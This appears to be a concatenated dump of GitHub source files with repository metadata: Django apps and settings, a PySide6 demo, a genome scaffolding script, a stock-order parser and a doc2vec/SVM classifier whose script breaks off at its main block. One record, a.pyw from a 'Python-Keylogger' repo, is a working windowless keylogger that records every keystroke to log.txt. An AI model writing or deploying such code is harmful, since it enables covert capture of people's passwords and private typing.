        HQ_clusters = config["rdir"] + "/cluster_category_stats/HQ_clusters.tsv",
        cat_stats = config["rdir"] + "/cluster_category_stats/cluster_category_summary_stats.tsv"
    output:
        cat_stats_done = touch(config["rdir"] + "/cluster_category_stats/cat_stats.done")
    run:
        # BUGFIX: the completion message said 'COMMUNITIES INFERENCE DONE',
        # copy-pasted from an unrelated rule; report this rule's own stage.
        shell("echo 'CLUSTER CATEGORY STATS DONE'")
|
[
"chiara.vanni5@gmail.com"
] |
chiara.vanni5@gmail.com
|
9b73734f9b2847b7b4edc6471bd2b3c3589280cf
|
94e210718afb2e9d5b4babc938adf89cd387bae7
|
/Una_Quest/users/models.py
|
62dc738dd4521ecb83a5907786b0af4d63aa7fc1
|
[] |
no_license
|
davidapdf/UnaQuest
|
8c1da0a553a580846eaab839dd3d49ae9b3c8f38
|
c725caaab5d79499e540d612f500d99bf409005a
|
refs/heads/master
| 2022-11-02T15:06:18.254716
| 2020-06-15T23:46:01
| 2020-06-15T23:46:01
| 263,780,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
from django.db import models
from django.contrib.auth.models import User
from django.contrib import admin
from django.forms import CheckboxSelectMultiple
class Unidade(models.Model):
    # Physical unit/campus: city, two-letter state code, free-text description.
    cidade = models.CharField(max_length = 200)
    estado = models.CharField(max_length = 2)
    descricao = models.TextField()
class Disciplina(models.Model):
    # Course subject: required name plus a free-text description.
    nome = models.CharField(max_length=500,blank=False,null=False)
    descricao = models.TextField()
class Professor(models.Model):
    """Teacher profile: 1:1 with an auth User, many-to-many with Disciplina,
    and 1:1 with the Unidade (campus) where the teacher works.

    NOTE(review): the original class carried a dead method named ``__ini__``
    (a typo for ``__init__``) that Python never invokes; it has been removed.
    Overriding ``Model.__init__`` with that positional signature would have
    broken Django's model instantiation anyway.
    """
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Field name "diciplina" (sic) is kept: renaming it would require a
    # schema migration and break existing queries.
    diciplina = models.ManyToManyField(Disciplina)
    unidade = models.OneToOneField(Unidade, on_delete=models.CASCADE)
class ProfessorAdmin(admin.ModelAdmin):
    # Render the many-to-many "diciplina" field as checkboxes in the admin.
    formfield_overrides = {
        models.ManyToManyField: {'widget': CheckboxSelectMultiple},
    }
    # Columns shown on the admin change-list page.
    list_display = ('id','user','unidade')
class Administrativo(models.Model):
    # Administrative staff profile: 1:1 with an auth User and with a Unidade.
    user = models.OneToOneField(User,on_delete=models.CASCADE)
    unidade = models.OneToOneField(Unidade, on_delete=models.CASCADE)
|
[
"davidalexandre@live.com"
] |
davidalexandre@live.com
|
6811c35128a21908b5e7d9975bb069e9cf91036d
|
efcf8a7309aab135dd127f9466ce5110556b5fbc
|
/chat_app/urls.py
|
ca3fe12efbf63cbf00cb953fc9cb23087bb54222
|
[] |
no_license
|
garizs/chatApp
|
62371d035b32c80cd1322848ecc4c82ea91a3d1b
|
8eb3d5b509f317cb40295e7d4d37f14c0bd2d855
|
refs/heads/master
| 2023-07-08T18:55:50.504650
| 2021-08-23T08:39:24
| 2021-08-23T08:39:24
| 395,544,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
from django.urls import path
from . import views
# Chat app routes: the index (lobby) page and a per-room page addressed by
# the room name captured from the URL path.
urlpatterns = [
    path('', views.index, name='index'),
    path('<str:room_name>/', views.room, name='room')
]
|
[
"i.kolesnikov@ritg.ru"
] |
i.kolesnikov@ritg.ru
|
98244b23e0ce113db9acb33b85781abda3504fab
|
82115f52db1783a2ce963e2621bf185c61ceb419
|
/Teoría/03 Widgets para formularios/3-1 Etiquetas/programa.py
|
f824e536fbaa1c1de04e3356c2ce610ec1b992ff
|
[] |
no_license
|
lesclaz/curso-qt-pyside-udemy
|
ce227df451a7cff40d90543ee6c892ea1a6b131c
|
8b9bbf5d45e916f1d7db9411728b2759b30d2fd9
|
refs/heads/master
| 2023-07-01T18:11:47.959668
| 2021-08-03T09:38:12
| 2021-08-03T09:38:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,020
|
py
|
from PySide6.QtWidgets import QApplication, QMainWindow, QLabel
from PySide6.QtCore import QSize, Qt
from PySide6.QtGui import QFont, QPixmap
from pathlib import Path
import sys
def absPath(file):
    """Return the absolute path of *file*, resolved relative to this script's
    own directory (not the current working directory)."""
    script_dir = Path(__file__).parent.absolute()
    return str(script_dir / file)
class MainWindow(QMainWindow):
    """Main window: a single QLabel that shows an image scaled to the window."""

    def __init__(self):
        super().__init__()
        self.setMinimumSize(QSize(480, 320))
        # The label is the only widget; it fills the whole window.
        label = QLabel("Soy una etiqueta")
        self.setCentralWidget(label)
        # Load the picture (path resolved next to this script) and show it.
        picture = QPixmap(absPath("naturaleza.jpg"))
        label.setPixmap(picture)
        # Let the pixmap grow/shrink together with the window.
        label.setScaledContents(True)
        # Center the content both horizontally and vertically.
        label.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
if __name__ == "__main__":
    app = QApplication()
    window = MainWindow()
    window.show()
    # BUGFIX: PySide6 renamed QApplication.exec_() to exec(); the
    # underscore form is a deprecated PySide2-era alias and is removed in
    # current releases.
    sys.exit(app.exec())
|
[
"hcostaguzman@gmail.com"
] |
hcostaguzman@gmail.com
|
36a1be7242226800cc31878126d2dc7d4c40a3c6
|
5ae1aff4d4b8c6e7d8aa0cb2065cdd42335c9250
|
/a.pyw
|
5f9d312fb6ef84c3e6c0383715f2a857102234eb
|
[] |
no_license
|
ShadowMaker07/Python-Keylogger
|
108d6a4991e7170f202f620119f0882ce1ba90a3
|
eaa22f43b9aacdc35556762b994d69f15d838936
|
refs/heads/main
| 2023-07-12T00:51:33.486743
| 2021-08-12T03:35:28
| 2021-08-12T03:35:28
| 395,184,063
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
pyw
|
from pynput.keyboard import Listener
def anonymous(key):
    """Key-press callback: append the key's text to log.txt.

    F12 raises SystemExit to stop the listener; Enter and Alt are logged
    as newlines; single quotes from pynput's repr are stripped.
    """
    text = str(key)
    if text == "Key.f12":
        raise SystemExit(0)
    if text in ("Key.enter", "Key.alt"):
        text = "\n"
    text = text.replace("'", "")
    with open("log.txt", "a") as log_file:
        log_file.write(text)
    print(text)
# Run the keyboard listener until the callback raises SystemExit
# (triggered by F12 inside `anonymous`).
with Listener(on_press = anonymous) as hacker:
    hacker.join()
|
[
"noreply@github.com"
] |
noreply@github.com
|
d2a83892c3da43a12e920ca1f2e2c8d6ddbaa060
|
0578860df5538f6e3ab6d65809566fd19012923f
|
/drf_demo/settings.py
|
acbb4408afe336945960369b6294efc2e557b23d
|
[] |
no_license
|
otykhonruk/drf_demo
|
735e7686003ed3c8ec95ebec735b350a111beb12
|
8037492519b205b7601d01a9cc2dc319a85cff1e
|
refs/heads/master
| 2022-07-20T15:16:28.178062
| 2016-07-26T13:39:25
| 2016-07-26T13:39:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,209
|
py
|
"""
Django settings for drf_demo project.
Generated by 'django-admin startproject' using Django 1.9.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): a hard-coded key is acceptable only for this demo project;
# load it from the environment before deploying anywhere real.
SECRET_KEY = '#qkdwnxb)fk6o1xqj$*cgnpi(cwpi5e1ks(d5b^l+@xru+7gr-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    # local demo app
    'ip_log',
]
# NOTE: MIDDLEWARE_CLASSES is the pre-Django-1.10 setting name, consistent
# with the Django 1.9 project this file was generated for.
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'drf_demo.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'drf_demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# SQLite file in the project root — development only.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
[
"a.tihonruk@gmail.com"
] |
a.tihonruk@gmail.com
|
8e04da130720a7160ddbfe0643e293f23d80cc2b
|
f158e45c3359882b68b00bdf11b44ed5e2ef509e
|
/myvenv/bin/markdown_py
|
5448d827bfe118ca7bacdac8c5f8d872d1e48159
|
[] |
no_license
|
idie11/delevery
|
65b7ce7682f0e5e403df244407fdc3ad2d51a588
|
9f0715e53a4d09f02477a5f3629ce9a13d9db86b
|
refs/heads/master
| 2023-06-04T02:41:25.280341
| 2021-06-23T14:39:15
| 2021-06-23T14:39:15
| 379,633,695
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 244
|
#!/home/idie/Desktop/delevery/myvenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from markdown.__main__ import run
if __name__ == '__main__':
    # Strip a setuptools wrapper suffix (-script.pyw / .exe) from argv[0]
    # before delegating to Markdown's CLI entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(run())
|
[
"aidaitazabekova@gmail.com"
] |
aidaitazabekova@gmail.com
|
|
53b3420227436ab63200c35eefa33a3bff01cdd4
|
ab933602ef9f962e7626edc2b4a600be4bc15a31
|
/test/test.py
|
dff54603e85627ff201e11d4de530ded9236d0d6
|
[] |
no_license
|
ksahlin/scaffolder
|
0f0d2c00214c103937b8e8d2e44f3fa156caa2b5
|
cd4f12aa974e352359a8be8b631c83a5b1a358f7
|
refs/heads/master
| 2020-03-30T10:31:08.149995
| 2014-01-05T20:09:27
| 2014-01-05T20:09:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,865
|
py
|
from besst.sequence import Scaffold
from besst.sequence import SubSequence as ss
from besst.sequence import Contig
from besst import score
from besst import interval
from besst.graph import SequenceGraph as g
from besst.graph import LinearPath
from besst.util import parse_input
# we are reading lines from a file with format for each link:
#contig1 start_cord_cont1 end_cord_contig1 direction contig2 start_cord_cont2 end_cord_cont2 direction nr_links
# %observations subseq1 (coordinates on the subseq of contig1 in space separated format with '%' sign first
# %observations subseq2 (coordinates on the subseq of contig1 in space separated format with '%' sign first
# True sequence: AAACCCGGGTTT
##
#preprocessing module
c1 = Contig('contig1','AAAGGG') # this should be split
c2 = Contig('contig2','AAAGGG') # this should be split and rc
print(c1.sequence)
s1 = ss('s1',c1,0,3)
s2 = ss('s2',c1,3,6)
s3 = ss('s3',c2,0,3)
s4 = ss('s4',c2,3,6)
print len(s1),len(s2)
# scaf = Scaffold('scaf1')
# # scaf.add_subsequence(s2,False,0)
# scaf.add_subsequence(s1,False,7)
print(s1)
print(s2)
# print(scaf)
G = g()
G.add_node(s1)
G.add_node(s2)
G.add_node(s3)
G.add_node(s4)
G.add_edge((s1,True),(s4,True),d=0,s=score.nr_links(10))
G.add_edge((s2,True),(s3,True),d=0,s=score.nr_links(12))
G.add_edge((s4,False),(s2,False),d=0,s=score.nr_links(7))
# false link!
G.add_edge((s1,True),(s1,False),d=0,s=score.nr_links(5))
# G.add_edge()
print 'GRAPH:'
for edge in G.edges():
repr(edge[0][0])
repr(edge[1][0])
print len(G.edges())
G.remove_self_links()
# for edge in G.iteredges():
# print edge
# print G[edge[0]][edge[1]]['s']
score_list=[]
for node in G.nodes_iter():
nbrs = G.neighbors(node)
if nbrs:
i = interval.Interval(node)
for nbr in nbrs:
start = G[node][nbr]['d']
end = G[node][nbr]['d'] + len(nbr[0])
weight = G[node][nbr]['s']
i.add_interval(nbr,start,end,weight)
# print i.intervals
i.weighted_interval_scheduling()
score_list.append(i)
print score_list
print sorted(score_list,reverse=True,key=lambda x:x.score)
visited = set()
# Greedily commit interval paths, highest score first. A path is only
# committed when none of the nodes it would consume has been used already.
for interval_object in sorted(score_list, reverse=True, key=lambda x: x.score):
    # Collect every graph node — (sequence, orientation) tuple — that joining
    # this interval's optimal path would touch.
    potential_nodes_to_join = set()
    potential_nodes_to_join.add(interval_object.startnode)
    if len(interval_object.optimal_path) > 1:
        for seq_obj in map(lambda x: x[3][0], interval_object.optimal_path[:-1]):
            # BUGFIX: set.add() takes a single element; the original called
            # add(seq_obj, True), which raises TypeError. Nodes elsewhere in
            # the graph are (sequence, orientation) tuples, so add those.
            potential_nodes_to_join.add((seq_obj, True))
            potential_nodes_to_join.add((seq_obj, False))
        potential_nodes_to_join.add(interval_object.optimal_path[-1][3])
    if not visited.intersection(potential_nodes_to_join):
        # make_trusted_path creates an unbreakable linear path in the
        # scaffold graph and returns all the nodes it visited.
        visited_nodes = G.make_trusted_path(interval_object)
        visited.update(visited_nodes)
print 'GRAPH:'
for edge in G.edges():
print (edge[0][0]),
print(edge[1][0])
##
# Make scaffolds.
# Find start nodes: a (sequence, orientation) node with no neighbors on one
# side is the tip of a linear path in the scaffold graph.
start_nodes = set()
for node in G.nodes_iter():
    ##
    # found a start node (this orientation has no outgoing edges)
    if not G.neighbors((node[0],True)):
        start_nodes.add((node[0],True))
    if not G.neighbors((node[0],False)):
        start_nodes.add((node[0],False))
print 'start nodes',start_nodes
for node in G.nodes():
print repr(node[0]), node
visited =set()
scaffold_index = 1
for start_node in start_nodes:
if start_node not in visited:
print 'Making scaffold',scaffold_index
s = Scaffold(scaffold_index)
scaffold_index += 1
path = LinearPath(G,start_node)
for node,gap in path:
print node[0].contig.name
if node[1]:
node[0].rc = False
s(str(node[0]))
else:
node[0].rc = True
s(str(node[0]))
if gap <= 0:
s('n')
else:
s('N'*gap)
visited.add(start_node)
visited.add(node)
print visited
print s
# print (G.neighbors((s1,True)))
#print G.most_likely_neighbor((s1,True))[0].contig.name
|
[
"kr_sahlin@hotmail.com"
] |
kr_sahlin@hotmail.com
|
b83f94235e23af5608c2cf8417a4d8a871840a23
|
ae8e406cd4ece587f124895193661da66ae051d7
|
/Bigflow/BranchExp/tasks.py
|
f8feb188a780afaf447db6e29870528e7ff4c46d
|
[] |
no_license
|
vigneashvicky/Bigflow
|
9dfaa4b94426973ef2f2972e84ed87dfeda93771
|
eec202312b482f191dd40111c473e636e0aa6978
|
refs/heads/master
| 2022-12-12T00:14:04.619978
| 2020-03-17T09:43:10
| 2020-03-17T09:43:10
| 235,542,581
| 0
| 0
| null | 2022-12-08T01:05:14
| 2020-01-22T09:47:31
|
HTML
|
UTF-8
|
Python
| false
| false
| 558
|
py
|
from __future__ import absolute_import, unicode_literals
from celery import task
from django.db import connection
import pandas as pd
@task()
def task_number_one():
    """Celery task: call the sp_APExpense_Set stored procedure and return its
    output message.

    Returns:
        dict: {"MESSAGE": <sixth OUT parameter of sp_APExpense_Set>}.
    """
    cursor = connection.cursor()
    # NOTE(review): the original first assigned ('SUPPLIER_DETAILS', 2, 1, '')
    # to `parameters` and immediately overwrote it; the dead assignment has
    # been dropped.
    parameters = ('COLUMN', 'ECF_INSERT', '{}', 'Y',
                  '{"Entity_Gid": [1]}', 1, '')
    cursor.callproc('sp_APExpense_Set', parameters)
    # The procedure's 6th argument is an OUT parameter, exposed by the DB
    # driver as a session variable after callproc().
    cursor.execute('select @_sp_APExpense_Set_6')
    sp_out_message = cursor.fetchone()
    # The original had two unreachable print() calls after this return;
    # they have been removed.
    return {"MESSAGE": sp_out_message[0]}
|
[
"vigneasraju@gmail.com"
] |
vigneasraju@gmail.com
|
87029e6698765d7c798ef1ff788ce84fbba0d878
|
e120a272e3a94170f013af5a8f763519ccedc725
|
/backend/api/tests/tests_user.py
|
4afc7b7014801b58142611a9c71b4f85eeac039a
|
[
"MIT"
] |
permissive
|
ardilom/project_template
|
e318248fc4182fbb32819f255543c65e30bc4103
|
e42fbf73da7037074f160a31201cae70d7a027dc
|
refs/heads/master
| 2022-12-11T13:29:49.072417
| 2020-09-13T12:31:08
| 2020-09-13T12:31:08
| 295,138,469
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# django
from django.urls import reverse
# models
from backend.api.models import User
# django rest
from rest_framework.test import APITestCase
class OKUserCreationTestCase(APITestCase):
    """Happy-path test: User.objects.create_superuser returns an instance."""
    def setUp(self):
        # Fixture values shared by the tests in this case.
        self.name = "Test"
        self.last_name = "User"
        self.email = "testuser@gmail.com"
        self.password = "testuser"
    def test_create_user(self):
        # create_superuser should build and return a non-None user.
        user = User.objects.create_superuser(
            email=self.email,
            password=self.password,
            first_name=self.name,
            last_name=self.last_name
        )
        self.assertIsNotNone(user, msg="Null!")
|
[
"fardila120@gmail.com"
] |
fardila120@gmail.com
|
fdad88fdb6c73ddb643e0f4ef0fbe3221a259018
|
7afbfd3bd0f6c205546b5b159a03f5a10637d28e
|
/Part2B_hsn1017_eunzle95.py
|
7e3b94be6a3fae139fffd3c35ca501ab8e2d8529
|
[] |
no_license
|
eunzle95/Project1_blog
|
9bbf84707502701f9b94457d03f40b9809f6e232
|
71a97fc48658dcae31db212520f857ea18869ee8
|
refs/heads/master
| 2020-08-11T07:02:12.054980
| 2019-10-11T21:42:14
| 2019-10-11T21:42:14
| 214,514,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,039
|
py
|
import re
symbols = ['AAPL', 'HP', 'IBM', 'AMZN', 'MSFT', 'GOOGL', 'INTC', 'CSCO', 'ORCL', 'QCOM']
# example input
# (34 AAPL shares buy at max 780, 24 IN shares sell at min 228) for account Hokie123
# (AAPL shares cancelled, IBM shares cancelled) for account Hokie123
s = raw_input()
# trades = 34 AAPL shares buy at max 780, 24 IBM shares sell at min 228, 12 AAPL shares buy at max 27
# trades = AAPL shares cancelled, IBM shares cancelled
trades = s[s.find("(")+1:s.find(")")]
# trade = ['34 AAPL shares buy at max 780', '24 IBM shares sell at min 228', '12 AAPL shares buy at max 27']
# trade = ['AAPL shares cancelled', 'IBM shares cancelled']
trade = trades.split(",")
#extraString = for account Hokie123
extraString = s.split(")")[1]
# checking trade syntax
for t in trade:
if len(t.split()) != 7:
print("syntax error")
exit()
# processing trade requests
for t in trade:
string = t
num1 = string.split()[0]
symbol = string.split()[1]
action = string.split()[3]
action2 = string.split()[4]
action3 = string.split()[5]
num2 = string.split()[6]
# check number syntax
p = re.compile('^[1-9]+[0-9]*$')
m1 = p.match(num1)
m2 = p.match(num2)
# No error in num1 and num2
if m1 and m2:
if action2 == "at":
if action == "buy":
if action3 == "max":
action = "BuyRequests"
else:
errorPosition = string.find(action3)
formerString = string.split(action3)
print(formerString[0] + action3)
print(" " * int(errorPosition) + "^")
exit()
elif action == "sell":
if action3 == "min":
action = "SellRequests"
else:
errorPosition = string.find(action3)
formerString = string.split(action3)
print(formerString[0] + action3)
print(" " * int(errorPosition) + "^")
exit()
elif action == "cancel":
if action3 == "request":
action = "CancelReqeusts"
else:
errorPosition = string.find(action3)
formerString = string.split(action3)
print(formerString[0] + action3)
print(" " * int(errorPosition) + "^")
exit()
else:
errorPosition = string.find(action)
formerString = string.split(action)
print(formerString[0] + action)
print(" " * int(errorPosition) + "^")
exit()
# first number syntax error
elif not m1:
errorPosition = s.find(num1)
formerString = s.split(num1)
print(formerString[0] + num1)
print(" " * int(errorPosition) + "^")
exit()
# second number syntax error
else:
errorPosition = s.find(num2)
formerString = s.split(num2)
print(formerString[0] + num2)
print(" " * int(errorPosition) + "^")
exit()
# check for shares grammar
if t.split()[2] != "shares":
errorPosition = s.find(t.split()[2])
formerString = s.split(t.split()[2])
print(formerString[0] + t.split()[2])
print(" " * int(errorPosition) + "^")
exit()
# when symbol is not in the given list of symbol
if symbol not in symbols:
errorPosition = s.find(symbol)
formerString = s.split(symbol)
print(formerString[0] + symbol)
print(" " * int(errorPosition) + "^")
exit()
# for account syntax checking
if extraString.split(" ", 3)[1] != "for":
errorPosition = s.find(extraString.split(" ", 3)[1])
formerString = s.split(extraString.split(" ", 3)[1])
print(formerString[0] + extraString.split(" ", 3)[1])
print(" " * int(errorPosition) + "^")
exit()
elif extraString.split(" ", 3)[2] != "account":
errorPosition = s.find(extraString.split(" ", 3)[2])
formerString = s.split(extraString.split(" ", 3)[2])
print(formerString[0] + extraString.split(" ", 3)[2])
print(" " * int(errorPosition) + "^")
exit()
else:
account = extraString.split(" ", 3)[3:]
# account syntax error
p = re.compile('[a-zA-Z]+[0-9]+$')
m = p.match(account[0])
if not m:
errorPosition = s.find(account[0])
formerString = s.split(account[0])
print(formerString[0] + account[0])
print(" " * int(errorPosition) + "^")
exit()
# no syntax error: emit the pseudo-SQL for the last processed trade.
# NOTE(review): "CancelReqeusts" (sic) matches the misspelled value assigned
# earlier in this script; both sides must stay in sync if either is fixed.
if action == "CancelReqeusts":
    print("CANCEL (Symbol, AccountID) VALUES ('{}', '{}')").format(symbol, account)
# BUGFIX: the original condition was `action == "BuyRequests" or
# "SellRequests"`, where the bare string literal is always truthy; both
# values must be compared against `action`.
elif action == "BuyRequests" or action == "SellRequests":
    print("INSERT INTO " + action + " (NumShares, Symbol, MaxPrice, AccountID) VALUES ('{}', '{}', '{}', '{}')").format(num1, symbol, num2, account)
|
[
"hsn1017@vt.edu"
] |
hsn1017@vt.edu
|
e752a0802891174af75fc03ead6bf8975f0782ba
|
19274b29218a3bff5342c725cd667992fb6bb449
|
/stage1_classify/classfication.py
|
966db8a36f2e554e0684602416064a7e37538a8b
|
[] |
no_license
|
qvbit/News-Event-Extraction-System
|
64dcae715fce5e33503f039734c8c218bce6630e
|
e592917891bcfb361c367ddad7c13247e95378ef
|
refs/heads/master
| 2020-04-05T20:47:22.779473
| 2019-02-04T14:54:12
| 2019-02-04T14:54:12
| 157,195,262
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,378
|
py
|
import pandas as pd
import numpy as np
import pickle
import itertools
import functools
import collections
import random
from sklearn.linear_model import LogisticRegression
from sklearn import svm
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import average_precision_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_recall_curve
from sklearn.utils.fixes import signature
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_validate
from sklearn.model_selection import train_test_split
from sklearn.neighbors import NearestNeighbors
from sklearn.metrics import roc_auc_score
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from gensim.test.utils import get_tmpfile
from gensim.utils import simple_preprocess
params = {'vector_size': [400],
'min_count': [1, 2],
'epochs': [20, 50, 100],
'window': [5, 10, 15],
'steps': [20, 30, 40],
'dm': [0, 1],
'threshold': [1e-2, 1e-5],
'negative': [5, 15]
}
def process(df):
df.dropna(subset=['body', 'headline', 'summary'], thresh=3, inplace=True)
df['categories'] = df['categories'].apply(lambda x: '. '.join(x))
df['train'] = [t + '. ' + h + '. ' + s + ' ' + b for t, h, s, b in
zip(list(df['categories']), list(df['headline']), list(df['summary']), list(df['body']))]
return df
def strat_test_train(X, y, test_size):
    """Single stratified shuffle split.

    Returns (X_train, y_train, X_test, y_test) with class proportions of *y*
    preserved in both parts; random_state is fixed for reproducibility.
    """
    splitter = StratifiedShuffleSplit(n_splits=1, test_size=test_size, random_state=42)
    for train_idx, test_idx in splitter.split(X, y):
        X_train = [X[i] for i in train_idx]
        X_test = [X[i] for i in test_idx]
        y_train = [y[i] for i in train_idx]
        y_test = [y[i] for i in test_idx]
    return X_train, y_train, X_test, y_test
def read_corpus(data):
    """Yield each document in *data* as a TaggedDocument tagged with its index."""
    for idx, doc in enumerate(data):
        yield TaggedDocument(simple_preprocess(doc), tags=[idx])
def doc2vec(data, vector_size, dm, threshold, negative, min_count, epochs, window):
    """Train a gensim Doc2Vec model on *data* (iterable of TaggedDocument).

    BUGFIX: the original passed the misspelled keyword ``epocphs=epochs`` to
    the Doc2Vec constructor, so the requested epoch count was silently
    ignored (or rejected, depending on the gensim version).

    NOTE(review): gensim's downsampling-threshold parameter is named
    ``sample``, not ``threshold`` — confirm ``threshold`` is actually
    accepted by the gensim version in use.
    """
    model = Doc2Vec(vector_size=vector_size,
                    dm=dm,
                    min_count=min_count,
                    window=window,
                    threshold=threshold,
                    negative=negative,
                    epochs=epochs,
                    workers=8)
    model.build_vocab(data)
    model.train(data, total_examples=model.corpus_count, epochs=model.epochs)
    return model
def embeddings(model, X, steps):
    """Infer one vector per tagged document in *X* using *model*."""
    return [model.infer_vector(doc.words, steps=steps) for doc in X]
def classifier(X_train, y_train):
    """Fit an SVM classifier on the training data and return it.

    BUGFIX: the original fitted the SVC but never returned it, making the
    function a no-op for callers (the fitted model was discarded).
    """
    clf = svm.SVC()
    clf.fit(X_train, y_train)
    return clf
def product_dict(**kwargs):
    """Yield one dict for every combination in the Cartesian product of the
    keyword-argument value lists (keys keep their given order)."""
    names = list(kwargs)
    for combo in itertools.product(*kwargs.values()):
        yield dict(zip(names, combo))
def flatten(x):
    """Recursively flatten nested iterables into a flat list.

    tuples, strings and dicts are treated as atomic values and kept as-is,
    matching the original behavior.

    BUGFIX: ``collections.Iterable`` was removed in Python 3.10; use the
    ``collections.abc`` location instead.
    """
    from collections.abc import Iterable  # local import: keeps the fix self-contained
    if isinstance(x, Iterable) and not isinstance(x, (tuple, str, dict)):
        return [item for element in x for item in flatten(element)]
    return [x]
def average(l):
    """Return the mean of *l*: fold the elements with + and divide by length."""
    total = functools.reduce(lambda acc, item: acc + item, l)
    return total / len(l)
def extract_pos(X_tr, y_tr):
    """Return a numpy array of the vectors in X_tr whose label equals 1."""
    positives = [vec for vec, label in zip(X_tr, y_tr) if label == 1]
    return np.array(positives)
def unpack_kwargs(**kwargs):
    """Pop the known hyperparameter names out of kwargs.

    Returns them as a tuple in the fixed order expected by full_pipeline;
    raises KeyError if any name is missing (same as the original).
    """
    order = ('vector_size', 'min_count', 'epochs', 'window',
             'steps', 'dm', 'threshold', 'negative')
    return tuple(kwargs.pop(name) for name in order)
def full_pipeline(scores, X_tr, y_tr, all_data, **kwargs):
    """Train doc2vec on the full corpus, embed X_tr, then 5-fold CV an SVM.

    Appends one entry (a list of [precision, recall, f1, accuracy] per fold)
    to `scores` and returns the mutated list.  kwargs must contain exactly
    the eight hyper-parameters that unpack_kwargs expects.
    """
    vector_size, min_count, epochs, window, steps, dm, threshold, negative = unpack_kwargs(**kwargs)
    print('Training doc2vec.. this will take some time')
    # Embeddings are trained on the whole (unlabelled) corpus, not just X_tr.
    d2v = doc2vec(all_data, vector_size=vector_size, dm=dm, threshold=threshold, negative=negative, min_count=min_count, epochs=epochs, window=window)
    X_tr = embeddings(d2v, X_tr, steps=steps)
    # NOTE(review): recent sklearn raises if random_state is set while
    # shuffle=False (the default) — confirm the pinned sklearn version.
    skf = StratifiedKFold(n_splits=5, random_state=42)
    temp, i = [], 0
    print('Cross-validating SVM')
    for train_index, test_index in skf.split(X_tr, y_tr):
        print('Split %r...' % i)
        X_tr_cv, X_te_cv = [X_tr[i] for i in train_index], [X_tr[i] for i in test_index]
        y_tr_cv, y_te_cv = [y_tr[i] for i in train_index], [y_tr[i] for i in test_index]
        clf = svm.SVC()
        clf.fit(X_tr_cv, y_tr_cv)
        y_pr_cv = clf.predict(X_te_cv)
        c = confusion_matrix(y_te_cv, y_pr_cv)
        print(c)
        p = precision_score(y_te_cv, y_pr_cv)
        r = recall_score(y_te_cv, y_pr_cv)
        f1 = f1_score(y_te_cv, y_pr_cv)
        a = accuracy_score(y_te_cv, y_pr_cv)
        temp.append([p, r, f1, a])
        i+=1
    scores.append(temp)
    print('----------------------------------------------------')
    return scores
if __name__ == '__main__':
    # Labelled earthquake-article dataframe plus the full unlabelled corpus
    # used to train the doc2vec embeddings.
